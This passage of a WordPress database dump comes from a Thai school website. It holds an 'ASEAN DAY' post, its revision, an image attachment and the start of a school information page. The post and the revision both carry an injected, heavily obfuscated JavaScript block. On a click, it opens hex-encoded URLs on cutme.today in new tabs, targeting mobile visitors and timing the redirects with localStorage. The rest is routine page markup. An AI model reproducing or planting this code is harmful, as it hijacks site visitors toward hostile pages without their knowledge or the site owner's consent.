_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ASEAN DAY','','publish','open','open','','asean-day','','','2024-09-03 11:59:43','2024-09-03 04:59:43','',0,'http://watprato.ssk.in.th/?p=358',0,'post','',0),
(359,2,'2024-09-03 11:58:34','2024-09-03 04:58:34','','457381847_122174879558202781_6672815312348190309_n','','inherit','open','closed','','457381847_122174879558202781_6672815312348190309_n-2','','','2024-09-03 11:58:34','2024-09-03 04:58:34','',358,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n-1.jpg',0,'attachment','image/jpeg',0),
(360,2,'2024-09-03 11:59:41','2024-09-03 04:59:41','<!-- wp:image {\"id\":359,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-359\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ASEAN DAY','','inherit','closed','closed','','358-revision-v1','','','2024-09-03 11:59:41','2024-09-03 04:59:41','',358,'http://watprato.ssk.in.th/?p=360',0,'revision','',0),
(361,2,'2024-09-06 16:00:55','2024-09-06 09:00:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 